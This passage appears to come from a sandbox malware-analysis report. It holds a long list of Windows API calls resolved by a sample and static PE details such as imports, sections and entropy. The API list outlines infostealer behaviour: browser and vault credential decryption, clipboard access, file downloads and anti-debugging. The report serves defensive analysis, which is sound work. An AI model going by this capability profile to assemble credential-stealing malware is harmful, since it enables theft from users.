- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.SetErrorMode",
- "msvcrt.dll._controlfp",
- "msvcrt.dll._except_handler3",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.__p__fmode",
- "msvcrt.dll.isalpha",
- "msvcrt.dll.__p__commode",
- "msvcrt.dll._adjust_fdiv",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._initterm",
- "msvcrt.dll.__getmainargs",
- "msvcrt.dll._acmdln",
- "msvcrt.dll.exit",
- "msvcrt.dll._XcptFilter",
- "msvcrt.dll._exit",
- "msvcrt.dll._snprintf",
- "msvcrt.dll.fclose",
- "msvcrt.dll.fseek",
- "msvcrt.dll.ftell",
- "msvcrt.dll.wcsstr",
- "msvcrt.dll._wfopen",
- "msvcrt.dll.srand",
- "msvcrt.dll.rand",
- "msvcrt.dll._snwprintf",
- "msvcrt.dll.isdigit",
- "msvcrt.dll.memset",
- "msvcrt.dll.memcpy",
- "wininet.dll.InternetOpenUrlA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetOpenUrlW",
- "wininet.dll.InternetOpenW",
- "wininet.dll.InternetOpenA",
- "urlmon.dll.URLDownloadToFileW",
- "shlwapi.dll.PathFileExistsW",
- "shlwapi.dll.PathFindFileNameA",
- "shlwapi.dll.PathFindFileNameW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.GetLogicalDriveStringsW",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.FindClose",
- "kernel32.dll.WriteFile",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.Sleep",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32Next",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.CreateThread",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.GetLastError",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.CreateProcessW",
- "user32.dll.SetClipboardData",
- "user32.dll.OpenClipboard",
- "user32.dll.EmptyClipboard",
- "user32.dll.GetClipboardData",
- "user32.dll.CloseClipboard",
- "user32.dll.CharUpperA",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegOpenKeyExW",
- "shell32.dll.ShellExecuteW",
- "ole32.dll.CoInitialize",
- "ole32.dll.CoCreateInstance",
- "msvcr100.dll.atexit",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "kernel32.dll.InitOnceExecuteOnce",
- "kernel32.dll.CreateSemaphoreW",
- "kernel32.dll.GetFileInformationByHandleEx",
- "kernel32.dll.SetFileInformationByHandle",
- "kernel32.dll.InitializeConditionVariable",
- "kernel32.dll.WakeConditionVariable",
- "kernel32.dll.WakeAllConditionVariable",
- "kernel32.dll.SleepConditionVariableCS",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.TryAcquireSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.SleepConditionVariableSRW",
- "kernel32.dll.CreateThreadpoolWork",
- "kernel32.dll.SubmitThreadpoolWork",
- "kernel32.dll.CloseThreadpoolWork",
- "api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable",
- "api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS",
- "api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.#2",
- "ws2_32.dll.#21",
- "ws2_32.dll.#9",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.#6",
- "ws2_32.dll.#5",
- "schannel.dll.SpUserModeInitialize",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegQueryValueExW",
- "ws2_32.dll.WSASend",
- "ws2_32.dll.WSARecv",
- "secur32.dll.FreeContextBuffer",
- "ncrypt.dll.SslOpenProvider",
- "ncrypt.dll.GetSChannelInterface",
- "bcryptprimitives.dll.GetHashInterface",
- "ncrypt.dll.SslIncrementProviderReferenceCount",
- "ncrypt.dll.SslImportKey",
- "bcryptprimitives.dll.GetCipherInterface",
- "ncrypt.dll.SslLookupCipherSuiteInfo",
- "user32.dll.LoadStringW",
- "ncrypt.dll.BCryptOpenAlgorithmProvider",
- "ncrypt.dll.BCryptGetProperty",
- "ncrypt.dll.BCryptCreateHash",
- "ncrypt.dll.BCryptHashData",
- "ncrypt.dll.BCryptFinishHash",
- "ncrypt.dll.BCryptDestroyHash",
- "crypt32.dll.CertGetCertificateChain",
- "userenv.dll.GetUserProfileDirectoryW",
- "sechost.dll.ConvertSidToStringSidW",
- "sechost.dll.ConvertStringSidToSidW",
- "userenv.dll.RegisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.QueryServiceConfigW",
- "cryptsp.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptVerifySignatureA",
- "cryptsp.dll.CryptDestroyKey",
- "cryptsp.dll.CryptDestroyHash",
- "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
- "ncrypt.dll.BCryptImportKeyPair",
- "ncrypt.dll.BCryptVerifySignature",
- "ncrypt.dll.BCryptDestroyKey",
- "crypt32.dll.CertVerifyCertificateChainPolicy",
- "crypt32.dll.CertFreeCertificateChain",
- "crypt32.dll.CertDuplicateCertificateContext",
- "ncrypt.dll.SslEncryptPacket",
- "ncrypt.dll.SslDecryptPacket",
- "crypt32.dll.CertFreeCertificateContext",
- "ncrypt.dll.SslDecrementProviderReferenceCount",
- "ncrypt.dll.SslFreeObject",
- "urlmon.dll.URLDownloadToFileA",
- "sechost.dll.OpenServiceA",
- "urlmon.dll.CoInternetCreateSecurityManager",
- "urlmon.dll.CoInternetCreateZoneManager",
- "urlmon.dll.CoInternetIsFeatureEnabledForUrl",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegEnumValueW",
- "kernel32.dll.QueryActCtxW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "sqlite3.dll.sqlite3_open_v2",
- "sqlite3.dll.sqlite3_prepare_v2",
- "sqlite3.dll.sqlite3_step",
- "sqlite3.dll.sqlite3_column_bytes",
- "sqlite3.dll.sqlite3_column_blob",
- "sqlite3.dll.sqlite3_column_text",
- "sqlite3.dll.sqlite3_finalize",
- "sqlite3.dll.sqlite3_close",
- "kernel32.dll.AreFileApisANSI",
- "kernel32.dll.LCIDToLocaleName",
- "kernel32.dll.LocaleNameToLCID",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.NdrClientCall2",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingFree",
- "mlang.dll.#112",
- "wininet.dll.FindFirstUrlCacheEntryA",
- "urlmon.dll.CreateUri",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptReleaseContext",
- "wininet.dll.FindNextUrlCacheEntryA",
- "urlmon.dll.CreateIUriBuilder",
- "urlmon.dll.IntlPercentEncodeNormalize",
- "wininet.dll.FindCloseUrlCache",
- "vaultcli.dll.VaultOpenVault",
- "vaultcli.dll.VaultCloseVault",
- "vaultcli.dll.VaultEnumerateItems",
- "vaultcli.dll.VaultGetItem",
- "vaultcli.dll.VaultFree",
- "ws2_32.dll.#22",
- "nss3.dll.NSS_Init",
- "nss3.dll.NSS_Shutdown",
- "nss3.dll.PK11_GetInternalKeySlot",
- "nss3.dll.PK11_FreeSlot",
- "nss3.dll.PK11_Authenticate",
- "nss3.dll.PK11SDR_Decrypt",
- "nss3.dll.sqlite3_open",
- "nss3.dll.sqlite3_prepare_v2",
- "nss3.dll.sqlite3_step",
- "nss3.dll.sqlite3_column_text",
- "nss3.dll.sqlite3_finalize",
- "nss3.dll.sqlite3_close",
- "pstorec.dll.PStoreCreateInstance",
- "kernel32.dll.IsProcessorFeaturePresent",
- "user32.dll.GetWindowInfo",
- "user32.dll.GetAncestor",
- "user32.dll.GetMonitorInfoA",
- "user32.dll.EnumDisplayMonitors",
- "user32.dll.EnumDisplayDevicesA",
- "gdi32.dll.ExtTextOutW",
- "gdi32.dll.GdiIsMetaPrintDC",
- "windowscodecs.dll.DllGetClassObject",
- "kernel32.dll.WerRegisterMemoryBlock",
- "oleaut32.dll.#8",
- "oleaut32.dll.#9",
- "oleaut32.dll.#10",
- "mscoree.dll.CorExitProcess",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "mswsock.dll.WSPStartup",
- "wshtcpip.dll.WSHOpenSocket",
- "wshtcpip.dll.WSHOpenSocket2",
- "wshtcpip.dll.WSHJoinLeaf",
- "wshtcpip.dll.WSHNotify",
- "wshtcpip.dll.WSHGetSocketInformation",
- "wshtcpip.dll.WSHSetSocketInformation",
- "wshtcpip.dll.WSHGetSockaddrType",
- "wshtcpip.dll.WSHGetWildcardSockaddr",
- "wshtcpip.dll.WSHGetBroadcastSockaddr",
- "wshtcpip.dll.WSHAddressToString",
- "wshtcpip.dll.WSHStringToAddress",
- "wshtcpip.dll.WSHIoctl",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "wersvc.dll.ServiceMain",
- "wersvc.dll.SvchostPushServiceGlobals",
- "advapi32.dll.RegGetValueW",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "faultrep.dll.WerpInitiateCrashReporting",
- "wer.dll.WerpCreateMachineStore",
- "shell32.dll.SHGetFolderPathEx",
- "ole32.dll.StringFromGUID2",
- "profapi.dll.#104",
- "userenv.dll.CreateEnvironmentBlock",
- "sspicli.dll.GetUserNameExW",
- "userenv.dll.DestroyEnvironmentBlock",
- "wer.dll.WerpSvcReportFromMachineQueue",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.DuplicateToken",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.CheckTokenMembership",
- "advapi32.dll.FreeSid",
- "wtsapi32.dll.WTSQueryUserToken",
- "winsta.dll.WinStationQueryInformationW",
- "advapi32.dll.CreateWellKnownSid",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.NdrClientCall3",
- "advapi32.dll.ImpersonateLoggedOnUser",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.RevertToSelf",
- "imm32.dll.ImmDisableIME",
- "psapi.dll.GetModuleFileNameExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "wer.dll.WerpCreateIntegratorReportId",
- "wer.dll.WerReportCreate",
- "wer.dll.WerpSetIntegratorReportId",
- "wer.dll.WerReportSetParameter",
- "dbgeng.dll.DebugCreate",
- "ntdll.dll.CsrGetProcessId",
- "ntdll.dll.DbgBreakPoint",
- "ntdll.dll.DbgPrint",
- "ntdll.dll.DbgPrompt",
- "ntdll.dll.DbgUiConvertStateChangeStructure",
- "ntdll.dll.DbgUiGetThreadDebugObject",
- "ntdll.dll.DbgUiIssueRemoteBreakin",
- "ntdll.dll.DbgUiSetThreadDebugObject",
- "ntdll.dll.NtAllocateVirtualMemory",
- "ntdll.dll.NtClose",
- "ntdll.dll.NtCreateDebugObject",
- "ntdll.dll.NtCreateFile",
- "ntdll.dll.NtDebugActiveProcess",
- "ntdll.dll.NtDebugContinue",
- "ntdll.dll.NtFreeVirtualMemory",
- "ntdll.dll.NtOpenProcess",
- "ntdll.dll.NtOpenThread",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.NtQueryInformationThread",
- "ntdll.dll.NtQueryMutant",
- "ntdll.dll.NtQueryObject",
- "ntdll.dll.NtQuerySystemInformation",
- "ntdll.dll.NtRemoveProcessDebug",
- "ntdll.dll.NtResumeThread",
- "ntdll.dll.NtSetInformationDebugObject",
- "ntdll.dll.NtSetInformationProcess",
- "ntdll.dll.NtSystemDebugControl",
- "ntdll.dll.NtWaitForDebugEvent",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlCreateProcessParameters",
- "ntdll.dll.RtlCreateUserProcess",
- "ntdll.dll.RtlDestroyProcessParameters",
- "ntdll.dll.RtlDosPathNameToNtPathName_U",
- "ntdll.dll.RtlFindMessage",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlGetFunctionTableListHead",
- "ntdll.dll.RtlGetUnloadEventTrace",
- "ntdll.dll.RtlGetUnloadEventTraceEx",
- "ntdll.dll.RtlInitAnsiString",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlTryEnterCriticalSection",
- "ntdll.dll.RtlUnicodeStringToAnsiString",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.NtQueryInformationToken",
- "kernel32.dll.CloseProfileUserMapping",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.DebugBreak",
- "kernel32.dll.DebugBreakProcess",
- "kernel32.dll.DebugSetProcessKillOnExit",
- "kernel32.dll.Module32First",
- "kernel32.dll.Module32FirstW",
- "kernel32.dll.Module32Next",
- "kernel32.dll.Module32NextW",
- "kernel32.dll.OpenThread",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.SetProcessShutdownParameters",
- "kernel32.dll.Thread32First",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.Wow64GetThreadSelectorEntry",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.ControlService",
- "advapi32.dll.CreateServiceA",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.DeleteService",
- "advapi32.dll.EnumServicesStatusExA",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.GetEventLogInformation",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.OpenServiceA",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.StartServiceA",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.GetSidSubAuthorityCount",
- "version.dll.GetFileVersionInfoSizeExW",
- "version.dll.GetFileVersionInfoExW",
- "dbghelp.dll.WinDbgExtensionDllInit",
- "dbghelp.dll.ExtensionApiVersion",
- "wer.dll.WerpSetDynamicParameter",
- "wer.dll.WerReportAddDump",
- "wer.dll.WerpSetCallBack",
- "wer.dll.WerReportSetUIOption",
- "wer.dll.WerpAddRegisteredDataToReport",
- "wer.dll.WerReportSubmit",
- "sensapi.dll.IsNetworkAlive",
- "user32.dll.CharUpperW",
- "wer.dll.WerpAddAppCompatData",
- "apphelp.dll.SdbGetFileAttributes",
- "apphelp.dll.SdbFormatAttribute",
- "apphelp.dll.SdbFreeFileAttributes",
- "cryptsp.dll.CryptAcquireContextW",
- "dbghelp.dll.MiniDumpWriteDump",
- "kernel32.dll.GetLongPathNameA",
- "kernel32.dll.GetLongPathNameW",
- "kernel32.dll.GetProcessTimes",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegQueryValueExA",
- "powrprof.dll.CallNtPowerInformation",
- "psapi.dll.EnumProcessModules",
- "version.dll.GetFileVersionInfoSizeA",
- "version.dll.GetFileVersionInfoA",
- "version.dll.VerQueryValueA",
- "verifier.dll.VerifierEnumerateResource",
- "ntdll.dll.NtSuspendProcess",
- "ntdll.dll.NtResumeProcess",
- "advapi32.dll.QueryTraceW",
- "advapi32.dll.IsValidSid",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.CopySid",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAceEx",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.ReportEventW",
- "advapi32.dll.DeregisterEventSource",
- "wer.dll.WerpGetStoreLocation",
- "wer.dll.WerpGetStoreType",
- "wer.dll.WerReportCloseHandle",
- "user32.dll.MsgWaitForMultipleObjects",
- "wer.dll.WerpFreeString",
- "user32.dll.GetProcessWindowStation",
- "user32.dll.GetThreadDesktop",
- "user32.dll.GetUserObjectInformationW",
- "werui.dll.WerUICreate",
- "werui.dll.WerUIStart",
- "werui.dll.WerUITerminate",
- "werui.dll.WerUIDelete"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "DebugActiveProcess",
- "address": "0x42a010"
- },
- {
- "name": "LockFile",
- "address": "0x42a014"
- },
- {
- "name": "CloseHandle",
- "address": "0x42a018"
- },
- {
- "name": "GetHandleInformation",
- "address": "0x42a01c"
- },
- {
- "name": "GetTickCount",
- "address": "0x42a020"
- },
- {
- "name": "lstrlenA",
- "address": "0x42a024"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x42a028"
- },
- {
- "name": "CreateHardLinkW",
- "address": "0x42a02c"
- },
- {
- "name": "GetNumberFormatW",
- "address": "0x42a030"
- },
- {
- "name": "ExitProcess",
- "address": "0x42a034"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x42a038"
- },
- {
- "name": "Module32First",
- "address": "0x42a03c"
- },
- {
- "name": "ReadFile",
- "address": "0x42a040"
- },
- {
- "name": "CreateFileW",
- "address": "0x42a044"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x42a048"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x42a04c"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x42a050"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42a054"
- },
- {
- "name": "GetBinaryTypeA",
- "address": "0x42a058"
- },
- {
- "name": "VirtualProtect",
- "address": "0x42a05c"
- },
- {
- "name": "PeekConsoleInputA",
- "address": "0x42a060"
- },
- {
- "name": "LocalAlloc",
- "address": "0x42a064"
- },
- {
- "name": "SetStdHandle",
- "address": "0x42a068"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x42a06c"
- },
- {
- "name": "EncodePointer",
- "address": "0x42a070"
- },
- {
- "name": "DecodePointer",
- "address": "0x42a074"
- },
- {
- "name": "RaiseException",
- "address": "0x42a078"
- },
- {
- "name": "RtlUnwind",
- "address": "0x42a07c"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x42a080"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42a084"
- },
- {
- "name": "GetLastError",
- "address": "0x42a088"
- },
- {
- "name": "HeapAlloc",
- "address": "0x42a08c"
- },
- {
- "name": "HeapFree",
- "address": "0x42a090"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x42a094"
- },
- {
- "name": "GetProcAddress",
- "address": "0x42a098"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x42a09c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42a0a0"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x42a0a4"
- },
- {
- "name": "HeapSize",
- "address": "0x42a0a8"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x42a0ac"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x42a0b0"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x42a0b4"
- },
- {
- "name": "WriteFile",
- "address": "0x42a0b8"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x42a0bc"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x42a0c0"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42a0c4"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x42a0c8"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x42a0cc"
- },
- {
- "name": "SetLastError",
- "address": "0x42a0d0"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x42a0d4"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x42a0d8"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x42a0dc"
- },
- {
- "name": "GetStdHandle",
- "address": "0x42a0e0"
- },
- {
- "name": "GetFileType",
- "address": "0x42a0e4"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x42a0e8"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x42a0ec"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x42a0f0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x42a0f4"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x42a0f8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x42a0fc"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x42a100"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x42a104"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x42a108"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x42a10c"
- },
- {
- "name": "CreateEventW",
- "address": "0x42a110"
- },
- {
- "name": "Sleep",
- "address": "0x42a114"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x42a118"
- },
- {
- "name": "TerminateProcess",
- "address": "0x42a11c"
- },
- {
- "name": "TlsAlloc",
- "address": "0x42a120"
- },
- {
- "name": "TlsGetValue",
- "address": "0x42a124"
- },
- {
- "name": "TlsSetValue",
- "address": "0x42a128"
- },
- {
- "name": "TlsFree",
- "address": "0x42a12c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x42a130"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x42a134"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x42a138"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x42a13c"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x42a140"
- },
- {
- "name": "CompareStringW",
- "address": "0x42a144"
- },
- {
- "name": "LCMapStringW",
- "address": "0x42a148"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x42a14c"
- },
- {
- "name": "IsValidLocale",
- "address": "0x42a150"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42a154"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x42a158"
- },
- {
- "name": "FreeLibrary",
- "address": "0x42a15c"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42a160"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x42a164"
- },
- {
- "name": "GetACP",
- "address": "0x42a168"
- },
- {
- "name": "GetOEMCP",
- "address": "0x42a16c"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42a170"
- },
- {
- "name": "ReadConsoleW",
- "address": "0x42a174"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "DialogBoxIndirectParamW",
- "address": "0x42a184"
- },
- {
- "name": "IsZoomed",
- "address": "0x42a188"
- },
- {
- "name": "RegisterDeviceNotificationW",
- "address": "0x42a18c"
- },
- {
- "name": "DrawStateA",
- "address": "0x42a190"
- },
- {
- "name": "GetMonitorInfoW",
- "address": "0x42a194"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "AbortSystemShutdownA",
- "address": "0x42a000"
- },
- {
- "name": "RegCreateKeyExA",
- "address": "0x42a004"
- },
- {
- "name": "RegisterServiceCtrlHandlerW",
- "address": "0x42a008"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "TransparentBlt",
- "address": "0x42a17c"
- }
- ],
- "dll": "MSIMG32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x000456cb",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x000456cb",
- "icon_hash": null,
- "entrypoint": "0x00404ea5",
- "timestamp": "2018-11-21 05:28:09",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00028800",
- "entropy": "6.65",
- "raw_address": "0x00000400",
- "virtual_size": "0x0002866f",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002a000",
- "size_of_data": "0x00011800",
- "entropy": "6.22",
- "raw_address": "0x00028c00",
- "virtual_size": "0x00011630",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003c000",
- "size_of_data": "0x00001e00",
- "entropy": "3.06",
- "raw_address": "0x0003a400",
- "virtual_size": "0x00804ea0",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00841000",
- "size_of_data": "0x00003e00",
- "entropy": "6.27",
- "raw_address": "0x0003c200",
- "virtual_size": "0x00003d40",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00845000",
- "size_of_data": "0x00002200",
- "entropy": "6.64",
- "raw_address": "0x00040000",
- "virtual_size": "0x000021a4",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003accc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000064"
- },
- {
- "virtual_address": "0x00841000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00003d40"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00845000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000021a4"
- },
- {
- "virtual_address": "0x0002a1f0",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
